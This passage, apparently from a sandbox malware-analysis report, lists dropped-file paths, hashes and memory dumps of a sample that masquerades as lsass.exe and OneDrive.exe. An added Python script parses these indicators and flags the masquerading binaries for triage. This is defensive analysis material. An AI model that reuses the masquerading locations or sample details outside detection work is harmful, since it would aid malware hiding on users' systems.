SHA512 d461500a84b8bef9d4331e78bbaaa974492b4cc1e1031ebbe2ac996ae6d0d6789c053f9737cc77f440cb72c1238a917b55467d464249ed305168d5982196e518

memory/324-272-0x000000000AB00000-0x000000000AB76000-memory.dmp

memory/1168-277-0x0000023BDBB80000-0x0000023BDBB90000-memory.dmp

memory/1168-275-0x0000023BDBB80000-0x0000023BDBB90000-memory.dmp

memory/1168-278-0x0000023BDBB80000-0x0000023BDBB90000-memory.dmp

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5d2242ff9dc07b67553123b3c939974d
SHA1 ec7b42a468cdb04f1403cd18f67aa4d5af6c5a7f
SHA256 27845ed84cb47c4ba2883bdd75c0a0be7035060f6ac845ca256a391bee640716
SHA512 25b081ed892b9bc03a7f77c16d110fdc8f03d118689f9773fff258e78a65c0e94c01886e01a4ba0cf5cb7bdb0d7e1e1babb58e1db4ba2582a4e1125b80ebd0ee

memory/1696-291-0x0000000000920000-0x0000000000D40000-memory.dmp

memory/1696-293-0x0000000000920000-0x0000000000D40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp635.tmp.bat

MD5 c3dd234ae1296e33130c940682bfcc40
SHA1 cdc9c01ce27c8263d65f4b0373c40f3906aabe29
SHA256 6f31dd824daa36bbfa2ab450fb2785124dd303697fafa7559ba3e5dc9001318c
SHA512 e8daa4199d55a03e110328b631b6b1a88f776d10ad2b9a6440d2e98b4824e3eed07884d4467edbab1bc2eb473dc19007ce07c6afe1663d2770c71f0d50769682

memory/1252-295-0x0000000000F10000-0x0000000001330000-memory.dmp

memory/1696-296-0x0000000000920000-0x0000000000D40000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/2628-302-0x0000022A0AF00000-0x0000022A0AF20000-memory.dmp

memory/4944-301-0x00007FF7183E0000-0x00007FF718DAA000-memory.dmp

memory/3892-303-0x0000000000400000-0x000000000058B000-memory.dmp

memory/1696-304-0x0000000006740000-0x000000000674A000-memory.dmp

memory/1696-305-0x0000000000920000-0x0000000000D40000-memory.dmp

memory/4340-306-0x00007FF6DA720000-0x00007FF6DA749000-memory.dmp

memory/2628-307-0x00007FF7D3ED0000-0x00007FF7D46BF000-memory.dmp

memory/324-309-0x000000000BE60000-0x000000000C022000-memory.dmp

memory/324-310-0x000000000C560000-0x000000000CA8C000-memory.dmp

memory/2628-311-0x0000022A9D440000-0x0000022A9D480000-memory.dmp

memory/1696-312-0x0000000000920000-0x0000000000D40000-memory.dmp

memory/4340-313-0x00007FF6DA720000-0x00007FF6DA749000-memory.dmp

memory/2628-314-0x00007FF7D3ED0000-0x00007FF7D46BF000-memory.dmp

memory/1696-316-0x0000000000920000-0x0000000000D40000-memory.dmp

memory/2628-318-0x00007FF7D3ED0000-0x00007FF7D46BF000-memory.dmp

memory/324-319-0x000000000D200000-0x000000000D250000-memory.dmp

memory/1696-322-0x0000000000920000-0x0000000000D40000-memory.dmp

memory/2628-324-0x00007FF7D3ED0000-0x00007FF7D46BF000-memory.dmp

memory/2628-326-0x0000022A0AF70000-0x0000022A0AF90000-memory.dmp

memory/1696-327-0x0000000000920000-0x0000000000D40000-memory.dmp

memory/2628-329-0x00007FF7D3ED0000-0x00007FF7D46BF000-memory.dmp

memory/2628-331-0x0000022A0AF70000-0x0000022A0AF90000-memory.dmp

memory/1696-332-0x0000000000920000-0x0000000000D40000-memory.dmp

memory/2628-334-0x00007FF7D3ED0000-0x00007FF7D46BF000-memory.dmp

memory/1696-336-0x0000000000920000-0x0000000000D40000-memory.dmp

memory/2628-339-0x00007FF7D3ED0000-0x00007FF7D46BF000-memory.dmp

memory/1696-340-0x0000000000920000-0x0000000000D40000-memory.dmp

memory/2628-342-0x00007FF7D3ED0000-0x00007FF7D46BF000-memory.dmp

memory/1696-344-0x0000000000920000-0x0000000000D40000-memory.dmp

memory/2628-346-0x00007FF7D3ED0000-0x00007FF7D46BF000-memory.dmp
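The listing above is the sandbox's raw inventory of dropped files (path followed by MD5/SHA1/SHA256/SHA512) and memory dumps (memory/<pid>-<event>-<start>-<end>-memory.dmp). The following is an added example, not part of the original report, that parses that format into structured IOCs, collapses the repeated hash entries by SHA256, flags dropped files that borrow a Windows binary name while living outside that binary's legitimate directory (lsass.exe and dllhost.exe under Roaming and ProgramData, OneDrive.exe under Roaming), and summarizes the dumped memory regions per PID. The EXPECTED_DIRS table is the editor's assumption about default install locations; the sample lines are copied from the entries above.

```python
import re
from collections import defaultdict

# Sample input: copied verbatim from the report's file/memory listing above
# (a subset of entries) so the parser runs offline.
SAMPLE = r"""
C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

memory/3892-238-0x0000000000400000-0x000000000058B000-memory.dmp

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/3968-227-0x00007FF7D26A0000-0x00007FF7D306A000-memory.dmp
memory/3968-259-0x00007FF7D26A0000-0x00007FF7D306A000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83
"""

PATH_RE = re.compile(r"^[A-Za-z]:\\\S.*$")
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
DUMP_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

# Editor's assumption (not from the report): directory suffixes where each of
# these binary names legitimately lives on a default Windows install. A drop of
# the same name anywhere else is masquerading (T1036).
EXPECTED_DIRS = {
    "lsass.exe": [r"\windows\system32"],
    "dllhost.exe": [r"\windows\system32", r"\windows\syswow64"],
    "onedrive.exe": [r"\appdata\local\microsoft\onedrive", r"\program files\microsoft onedrive"],
}


def parse_report(text):
    """Split the listing into file records and memory-dump records."""
    files, dumps, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if PATH_RE.match(line):
            current = {"path": line}      # hash lines that follow belong to this path
            files.append(current)
            continue
        m = HASH_RE.match(line)
        if m and current is not None:
            current[m.group(1).lower()] = m.group(2).lower()
            continue
        m = DUMP_RE.match(line)
        if m:
            pid, event, start, end = m.groups()
            start_i, end_i = int(start, 16), int(end, 16)
            dumps.append({"pid": int(pid), "event": int(event),
                          "start": start_i, "end": end_i, "size": end_i - start_i})
    return files, dumps


def paths_by_sha256(files):
    """Collapse repeated drops of the same payload: SHA256 -> sorted paths."""
    out = defaultdict(set)
    for f in files:
        if "sha256" in f:
            out[f["sha256"]].add(f["path"])
    return {k: sorted(v) for k, v in out.items()}


def masquerade_findings(files):
    """(path, sha256) for drops whose file name imitates a known binary but
    whose directory is not one of that binary's expected locations."""
    findings = []
    for f in files:
        directory, _, name = f["path"].rpartition("\\")
        expected = EXPECTED_DIRS.get(name.lower())
        if expected is None:
            continue
        if not any(directory.lower().endswith(s) for s in expected):
            findings.append((f["path"], f.get("sha256")))
    return findings


def dump_regions_by_pid(dumps):
    """Distinct (start, end, size) regions per PID; repeated dumps of the same
    range (different event ids) collapse to one entry. Bases around
    0x00007FF7... are 64-bit image mappings; 0x00400000 is the classic
    32-bit image base."""
    regions = defaultdict(set)
    for d in dumps:
        regions[d["pid"]].add((d["start"], d["end"], d["size"]))
    return {pid: sorted(r) for pid, r in regions.items()}


if __name__ == "__main__":
    files, dumps = parse_report(SAMPLE)
    for sha, paths in paths_by_sha256(files).items():
        print(sha, "->", paths)
    for path, sha in masquerade_findings(files):
        print("MASQUERADE", path, sha)
    for pid, regs in dump_regions_by_pid(dumps).items():
        for start, end, size in regs:
            print(f"pid {pid}: 0x{start:016X}-0x{end:016X} ({size:#x} bytes)")
```

The region summary is what you would feed to a dump-extraction step: the 0x9CA000-byte mapping at 0x00007FF7D26A0000 in PID 3968 is an image-sized 64-bit region, while PID 3892's 0x400000-0x58B000 range is a 32-bit image base, which is the first thing to carve and scan with the miner and stealer YARA rules the report's signatures name.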